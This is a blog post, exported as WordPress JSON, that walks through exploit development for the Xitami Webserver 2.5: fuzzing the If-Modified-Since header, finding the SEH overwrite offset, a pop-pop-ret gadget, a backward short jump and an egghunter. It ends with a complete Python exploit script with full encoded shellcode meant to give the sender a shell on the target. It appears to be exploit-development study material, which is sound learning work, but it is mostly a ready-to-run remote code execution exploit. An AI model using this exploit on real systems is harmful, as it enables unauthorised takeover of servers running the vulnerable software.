{"id":34,"date":"2021-02-10T10:04:09","date_gmt":"2021-02-10T10:04:09","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=34"},"modified":"2021-02-10T10:04:46","modified_gmt":"2021-02-10T10:04:46","slug":"34","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/34\/","title":{"rendered":"Exploit Development: Xitami Webserver 2.5 &#8211; SEH + Egghunter"},"content":{"rendered":"\n<h2>Fuzzing<\/h2>\n\n\n\n<p>get HTTP request<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>GET \/ HTTP\/1.1Host: 192.168.1.9User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txt<br>Vulnerable:If-Modified-Since: Wed, &lt;fuzzing-payload&gt;<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>s_string(&#8220;If-Modified-Since: Sat,&#8221;, name=&#8221;If-Modified-Since&#8221;, fuzzable = False)s_delim(&#8221; &#8220;, name=&#8221;space-10&#8221;, fuzzable = False)s_string(&#8220;15 Jun 2019 01:36:09 GMT&#8221;, name=&#8221;If-Modified-Since-Value&#8221;)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/IFXopzh-NnkrFweOXz2fV7F0CY-B-ctKJIWf24faacUdzmc0vvBfiLgr95rTOhibD3HTMpARLubVZb3oeDy0mx4wNZoHPmbVZHkmxYEM31q78GdNQu3VkOZD__IJdX0N9t2_3wWp\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/s2ipxR9H-nPEbnF7GVTkWSC5nD_-nhDabcpIOMWwRcdDHzqFFnm5eXEIsDByQIWdRy-K1Oc8zqHqu_OXk7F-m0_CTbvngKdQSmrsWI0_nB-PjH7Tz_ao0C2DcCnVGfavRHEzE40H\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Offset<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>#!\/usr\/bin\/python<br>import socket, sys, os<br><br>ip = &#8220;192.168.1.9&#8221;port = 80<br>offset = &#8220;A&#8221;*350<br>buffer = offset + nseh + seh<br>request = &#8220;&#8221;request += &#8220;GET \/ HTTP\/1.1\\r\\n&#8221;request += &#8220;Host: 192.168.1.9\\r\\n&#8221;request += &#8220;User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\\r\\n&#8221;request += &#8220;Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\r\\n&#8221;request += &#8220;Accept-Language: en-US,en;q=0.5\\r\\n&#8221;request += &#8220;Accept-Encoding: gzip, deflate\\r\\n&#8221;request += &#8220;Connection: close\\r\\n&#8221;request += &#8220;Upgrade-Insecure-Requests: 1\\r\\n&#8221;request += &#8220;If-Modified-Since: Thu, &#8221; + buffer + &#8220;\\r\\n\\r\\n&#8221;<br>s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/1OxEg0v-Ng6EwNLAEZd6dtnsSGUxKprkGcG9AJ3DdNIpArjZl2VdJFdicqUXo1imaXSicNY2HQwpFoNqGAXHUpEV9y2jrnXqCP8RBZN9R6W0a4gsaBJ46AsAz16BltjAgkcGgi5S\" alt=\"\"\/><\/figure>\n\n\n\n<h2>SEH overwrite<\/h2>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/zlbqv3FHw0K73XNSspG6vB5f4AzWslMvWZzLniUmfxTkic5quS7sInYvRzNgUdyA1dyPuipSI6xt7hWHssfYuXEiUtR1G1nFPDStyv4j7GrtuR7Ian3YlJgwW6UzNgrSio5VBseE\" alt=\"\"\/><\/figure>\n\n\n\n<h2>POP-POP-RET<\/h2>\n\n\n\n<p>!mona seh<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/wTZdzID93_iWwSr3XDh9owOwY-5XWBLixXjRhJMoTbh6Q8X-EaZ-0TQoT4pOdIoCiNdzjBPyD1BQAPJwLl2sY2ccU87qVrbyfa5kIKYObLR5ZwFUScLMHvMzTWqLR9LRop2rjd0T\" alt=\"\"\/><\/figure>\n\n\n\n<p>Address starts with null characterIf we only take 44F584 part of 0044F584, D characters we add after seh will make it 4444F584&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/prc27T1Rxa5-GN420tkbTBt7HV0yAqbdAzyZDmO1i-ijzBAlXhE2BcKdDCvGM0Srcky9ZxdzDgj3GSl4uoe0VoXsBvV5OCL1h9TP282tGtcQ7ACFQcC4mGlseD4fogHHr4ARdKW9\" alt=\"\"\/><\/figure>\n\n\n\n<p>If we remove D characters, the correct address will be found<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/XwN0GIil3dP14pWUZGGDtbWsjIOAZttoH-QM_QgGFe3A82mSdKLmr5E3MmW0cJPgn3rOdLCZYfWBa21GG_tTYR-NQP-I90MaPsAQMFLun_odE1NQvRjACvux0Hv39rJOXuDxZpHy\" alt=\"\"\/><\/figure>\n\n\n\n<p>Remember normal SEH structure for the exploit<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>[Junk][nSEH][SEH][Nop-Shellcode]<br>nSEH = the jump to the shellcodeSEH = a reference to a pop pop ret<br>find offsetfind pop-pop-retshort jump with nsehcreate shellcode<br>offset = &#8220;A&#8221;*304nseh = &#8220;\\xcc\\xcc\\xcc\\xcc&#8221;seh = &#8220;\\x57\\xf8\\x44&#8221; # pop-pop-ret 0x0044f857nops = &#8220;\\x90&#8221; *24shellcode = &#8220;&#8221;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>But we don&#8217;t have many place so we&#8217;ll go backwards<br>50 jmp back = \\xeb\\xcc<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/DBjFyzeABsCN36nuFlTHmFtp2DLdv6d14kHZvSUIF2E_P6L6eTgWGup455_88T800dYQEw_AbVUH51H7SujtfARLy1u5TgTXKj58sdMPusPeXSf_H8vEZA7ZGcxRNemgJjq0nC1c\" alt=\"\"\/><\/figure>\n\n\n\n<h2>Calculations:<\/h2>\n\n\n\n<p>JMP 50 bytes back<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/z5Nnm29mNgSibmjEhyjpf_b8ezsy3HMSLNg_4jp9h3BH83zcHeLsQ_aU124FmI3Be-pGUWaUPRF4nQ-w8QkcZxPDsiMd4gKC9FIs_Z79uShIEyHEwxd0PjL5Y-nnE_85B4HetOFJ\" alt=\"\"\/><\/figure>\n\n\n\n<p>We need meaningful calculations. There are some corruptions in A buffer.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/Jnupy5q_zTbipC6sRl380ZSK-vUy5SrQUcj5CR5pqVy41E2YcwnYNOHu9OJwvEdeXnMz8ZKuO8qGKosZSW6oHUXc-h8xmrCmYegYoq6quKoiEtbXCHn1XsRS-HBfeniYaN23slu7\" alt=\"\"\/><\/figure>\n\n\n\n<p>Start of A buffer = 6FE80&#8243;A&#8221; buffer start after the corruptions = 6FEE0eip (at the end of As) = 6FF7E<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/QHTSpIn4hvbbxp05JaRze2XSTpQIPnDIHYoOm5e-9LAljcYnYB2njk0kJkM0SeBELoODizO1bC_Jc6_Uv1Rcd6WAfT6Yri3yGHJwOx3iFlqBfKAEgzR7hvZY6aNmEG8GcCSzbmVa\" alt=\"\"\/><\/figure>\n\n\n\n<p>So there is enough space more than 50 bytes.<br>Let&#8217;s JMP 50 back and the new address right after \\xeb\\xcc is 0x6FF7E<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/dCAzB-K5L_GuF1YLfMqoMNoNK7QRRDB_LsstdORq6NKjxaL2L6tnmHrZGDb4VmJFZjjZ3epIkvUAPaErE7e6LarjYpJuJSgQKqY6c9n5YMIcYIaphq1tKcLPNzxAHVzahPBpuOgc\" alt=\"\"\/><\/figure>\n\n\n\n<p>The calculation for space before egghunterStart of A buffer = 6fe80new address after JMP 50 back = 6ff7e<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/esFM-YWWrQ6WnaXvImfiFDJCij2DZOTm-AlAlJPg35RhzqNAXuhWBNfjPKmRmzB3d3WVvPqYadK2m9qGZD_XCr9Ez8xSq2iMjSY1YAIEKy4X1rH98V99lB1BQd7UbCp2oobfjsUM\" alt=\"\"\/><\/figure>\n\n\n\n<p>So the offset will be like following:<br>offset = &#8220;A&#8221;*254 + egghunter + &#8220;A&#8221;*(304-254-32)<br>Before we do JMP 50 backwards with our calculations:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/AMN-jcKgpkABQC9XJ1GXrnSGx12tQNR4qz5Gcipfk1VudH8zgxnbS2UGQaH5Fem0s3ZmqSuj2-UZt1fViu2Q9SG-CMHImKQ2V6Kt3re7w1lzBaU_ZnsotDu0oWICbWw3D__wJA4n\" alt=\"\"\/><\/figure>\n\n\n\n<p>After JMP 50 backwards, the address becomes 6ff7e which is the start address of egghunter as can be seen in memory dump<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/OaE3Io_P38WKTFTfI90djrGGs6IlNmTwb-MzC3kAhlH9q-U1lxi692SuwHSknx6rLU9MN7RrjpKQfsN8qkTZDj_7jsM8KB1g_NOUMtDtuclRbNKlLeVsL6h4ESWgxe9YTdmh_RvC\" alt=\"\"\/><\/figure>\n\n\n\n<p>We&#8217;re all set. Let&#8217;s create the shellcode and get a shell<br><\/p>\n\n\n\n<h2>Final Exploit and Shell<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>#!\/usr\/bin\/python<br>import socket, sys, os<br><br>ip = &#8220;192.168.1.9&#8221;port = 80<br><br>egghunter = &#8220;\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x6b\\x61\\x6c\\x69\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7&#8221;<br>#offset = &#8220;A&#8221;* 254 + egghunter + &#8220;A&#8221;*(304-254-32)offset = &#8220;A&#8221;*254 + egghunter + &#8220;A&#8221;*(304-254-32)nseh = &#8220;\\xeb\\xcc\\x90\\x90&#8243;seh = &#8220;\\x57\\xf8\\x44&#8221; # pop-pop-ret 0x0044f857<br>egg = &#8220;kalikali&#8221;shellcode =&nbsp; &#8220;&#8221;shellcode += &#8220;\\x89\\xe3\\xdb\\xc9\\xd9\\x73\\xf4\\x58\\x50\\x59\\x49\\x49&#8243;shellcode += &#8220;\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43&#8243;shellcode += &#8220;\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30&#8243;shellcode += &#8220;\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30&#8243;shellcode += &#8220;\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49&#8243;shellcode += &#8220;\\x39\\x6c\\x79\\x78\\x6d\\x52\\x45\\x50\\x73\\x30\\x77\\x70&#8243;shellcode += &#8220;\\x43\\x50\\x6d\\x59\\x6d\\x35\\x30\\x31\\x6b\\x70\\x31\\x74&#8243;shellcode += &#8220;\\x6e\\x6b\\x62\\x70\\x36\\x50\\x6c\\x4b\\x76\\x32\\x54\\x4c&#8221;shellcode += &#8220;\\x6c\\x4b\\x73\\x62\\x46\\x74\\x6c\\x4b\\x70\\x72\\x74\\x68&#8243;shellcode += &#8220;\\x56\\x6f\\x38\\x37\\x61\\x5a\\x67\\x56\\x35\\x61\\x59\\x6f&#8221;shellcode += &#8220;\\x4c\\x6c\\x37\\x4c\\x75\\x31\\x61\\x6c\\x36\\x62\\x44\\x6c&#8221;shellcode += &#8220;\\x65\\x70\\x6b\\x71\\x4a\\x6f\\x54\\x4d\\x36\\x61\\x5a\\x67&#8243;shellcode += &#8220;\\x39\\x72\\x6a\\x52\\x33\\x62\\x70\\x57\\x6e\\x6b\\x62\\x72&#8243;shellcode += &#8220;\\x52\\x30\\x6e\\x6b\\x73\\x7a\\x35\\x6c\\x6c\\x4b\\x32\\x6c&#8221;shellcode += &#8220;\\x47\\x61\\x34\\x38\\x5a\\x43\\x52\\x68\\x55\\x51\\x48\\x51&#8243;shellcode += &#8220;\\x66\\x31\\x4c\\x4b\\x50\\x59\\x77\\x50\\x37\\x71\\x68\\x53&#8243;shellcode += &#8220;\\x4e\\x6b\\x70\\x49\\x52\\x38\\x39\\x73\\x36\\x5a\\x63\\x79&#8243;shellcode += &#8220;\\x4c\\x4b\\x45\\x64\\x6e\\x6b\\x57\\x71\\x4a\\x76\\x74\\x71&#8243;shellcode += &#8220;\\x79\\x6f\\x6e\\x4c\\x59\\x51\\x7a\\x6f\\x76\\x6d\\x56\\x61&#8243;shellcode += &#8220;\\x4a\\x67\\x57\\x48\\x4b\\x50\\x34\\x35\\x7a\\x56\\x44\\x43&#8243;shellcode += &#8220;\\x31\\x6d\\x6a\\x58\\x45\\x6b\\x71\\x6d\\x67\\x54\\x43\\x45&#8243;shellcode += &#8220;\\x48\\x64\\x71\\x48\\x4e\\x6b\\x52\\x78\\x67\\x54\\x43\\x31&#8243;shellcode += &#8220;\\x58\\x53\\x33\\x56\\x6c\\x4b\\x44\\x4c\\x32\\x6b\\x4c\\x4b&#8221;shellcode += &#8220;\\x36\\x38\\x35\\x4c\\x73\\x31\\x58\\x53\\x4e\\x6b\\x55\\x54&#8243;shellcode += &#8220;\\x6c\\x4b\\x45\\x51\\x7a\\x70\\x4e\\x69\\x62\\x64\\x54\\x64&#8243;shellcode += &#8220;\\x64\\x64\\x63\\x6b\\x53\\x6b\\x75\\x31\\x33\\x69\\x73\\x6a&#8221;shellcode += &#8220;\\x33\\x61\\x69\\x6f\\x59\\x70\\x61\\x4f\\x61\\x4f\\x72\\x7a&#8221;shellcode += &#8220;\\x6c\\x4b\\x54\\x52\\x48\\x6b\\x4c\\x4d\\x53\\x6d\\x52\\x48&#8243;shellcode += &#8220;\\x45\\x63\\x37\\x42\\x65\\x50\\x35\\x50\\x65\\x38\\x50\\x77&#8243;shellcode += &#8220;\\x44\\x33\\x50\\x32\\x31\\x4f\\x46\\x34\\x43\\x58\\x30\\x4c&#8221;shellcode += &#8220;\\x31\\x67\\x61\\x36\\x36\\x67\\x6b\\x4f\\x4e\\x35\\x4e\\x58&#8243;shellcode += &#8220;\\x6c\\x50\\x67\\x71\\x55\\x50\\x65\\x50\\x36\\x49\\x49\\x54&#8243;shellcode += &#8220;\\x62\\x74\\x36\\x30\\x35\\x38\\x67\\x59\\x6b\\x30\\x52\\x4b&#8221;shellcode += &#8220;\\x73\\x30\\x79\\x6f\\x6a\\x75\\x66\\x30\\x36\\x30\\x36\\x30&#8243;shellcode += &#8220;\\x76\\x30\\x63\\x70\\x66\\x30\\x37\\x30\\x52\\x70\\x55\\x38&#8243;shellcode += &#8220;\\x49\\x7a\\x36\\x6f\\x39\\x4f\\x69\\x70\\x69\\x6f\\x4e\\x35&#8243;shellcode += &#8220;\\x4c\\x57\\x32\\x4a\\x66\\x65\\x50\\x68\\x59\\x50\\x4f\\x58&#8243;shellcode += &#8220;\\x65\\x51\\x57\\x78\\x63\\x58\\x47\\x72\\x77\\x70\\x71\\x32&#8243;shellcode += &#8220;\\x6c\\x78\\x6c\\x49\\x4d\\x36\\x51\\x7a\\x76\\x70\\x62\\x76&#8243;shellcode += &#8220;\\x70\\x57\\x70\\x68\\x6d\\x49\\x79\\x35\\x72\\x54\\x50\\x61&#8243;shellcode += &#8220;\\x39\\x6f\\x58\\x55\\x6c\\x45\\x59\\x50\\x42\\x54\\x64\\x4c&#8221;shellcode += &#8220;\\x79\\x6f\\x42\\x6e\\x44\\x48\\x72\\x55\\x78\\x6c\\x70\\x68&#8243;shellcode += &#8220;\\x6c\\x30\\x6e\\x55\\x4e\\x42\\x76\\x36\\x69\\x6f\\x78\\x55&#8243;shellcode += &#8220;\\x62\\x48\\x63\\x53\\x32\\x4d\\x45\\x34\\x47\\x70\\x4d\\x59&#8243;shellcode += &#8220;\\x38\\x63\\x73\\x67\\x42\\x77\\x72\\x77\\x64\\x71\\x6b\\x46&#8243;shellcode += &#8220;\\x30\\x6a\\x37\\x62\\x36\\x39\\x50\\x56\\x6a\\x42\\x39\\x6d&#8221;shellcode += &#8220;\\x71\\x76\\x5a\\x67\\x53\\x74\\x37\\x54\\x67\\x4c\\x77\\x71&#8243;shellcode += &#8220;\\x73\\x31\\x6c\\x4d\\x62\\x64\\x54\\x64\\x76\\x70\\x6b\\x76&#8243;shellcode += &#8220;\\x63\\x30\\x61\\x54\\x36\\x34\\x52\\x70\\x31\\x46\\x70\\x56&#8243;shellcode += &#8220;\\x63\\x66\\x72\\x66\\x43\\x66\\x50\\x4e\\x32\\x76\\x66\\x36&#8243;shellcode += &#8220;\\x66\\x33\\x36\\x36\\x65\\x38\\x34\\x39\\x48\\x4c\\x35\\x6f&#8221;shellcode += &#8220;\\x6e\\x66\\x4b\\x4f\\x7a\\x75\\x6d\\x59\\x6d\\x30\\x62\\x6e&#8221;shellcode += &#8220;\\x61\\x46\\x42\\x66\\x69\\x6f\\x76\\x50\\x63\\x58\\x56\\x68&#8243;shellcode += &#8220;\\x4f\\x77\\x37\\x6d\\x75\\x30\\x49\\x6f\\x4b\\x65\\x6f\\x4b&#8221;shellcode += &#8220;\\x58\\x70\\x6c\\x75\\x4d\\x72\\x76\\x36\\x72\\x48\\x39\\x36&#8243;shellcode += &#8220;\\x6a\\x35\\x4f\\x4d\\x4d\\x4d\\x6b\\x4f\\x4b\\x65\\x37\\x4c&#8221;shellcode += &#8220;\\x44\\x46\\x61\\x6c\\x34\\x4a\\x6d\\x50\\x4b\\x4b\\x49\\x70&#8243;shellcode += &#8220;\\x64\\x35\\x34\\x45\\x6f\\x4b\\x31\\x57\\x46\\x73\\x51\\x62&#8243;shellcode += &#8220;\\x72\\x4f\\x52\\x4a\\x57\\x70\\x71\\x43\\x59\\x6f\\x4b\\x65&#8243;shellcode += &#8220;\\x41\\x41&#8221;<br>stage1 = offset + nseh + sehstage2 = egg + shellcode<br>request = &#8220;&#8221;request += &#8220;GET \/ HTTP\/1.1\\r\\n&#8221;request += &#8220;Host: 192.168.1.9&#8221; + stage2 + &#8220;\\r\\n&#8221;request += &#8220;User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\\r\\n&#8221;request += &#8220;Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\r\\n&#8221;request += &#8220;Accept-Language: en-US,en;q=0.5\\r\\n&#8221;request += &#8220;Accept-Encoding: gzip, deflate\\r\\n&#8221;request += &#8220;Connection: close\\r\\n&#8221;request += &#8220;Upgrade-Insecure-Requests: 1\\r\\n&#8221;request += &#8220;If-Modified-Since: Thu, &#8221; + stage1 + &#8220;\\r\\n\\r\\n&#8221;<br><br>s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/8A3p4U9OgheDUewOfLunL7Q7WNzwnqT_mX1ovNAi3ULT45ybefDHb3jEZH93W1542UwrLbk6Tux-cUjlTbOvOH_t36-wkFHJ-2kOXt2DhoVzeH0RjbvNFpsSrMxGPwx96FAe92M9\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Fuzzing get HTTP request GET \/ HTTP\/1.1Host: 192.168.1.9User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0 Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txtVulnerable:If-Modified-Since: Wed, &lt;fuzzing-payload&gt; s_string(&#8220;If-Modified-Since: Sat,&#8221;, name=&#8221;If-Modified-Since&#8221;, fuzzable = False)s_delim(&#8221; &#8220;, name=&#8221;space-10&#8221;, fuzzable = False)s_string(&#8220;15 Jun 2019 01:36:09&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/34\/\">Continue reading <span class=\"screen-reader-text\">Exploit Development: Xitami Webserver 2.5 &#8211; SEH + Egghunter<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34\/revisions"}],"predecessor-version":[{"id":36,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34\/revisions\/36"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=34"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=34"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}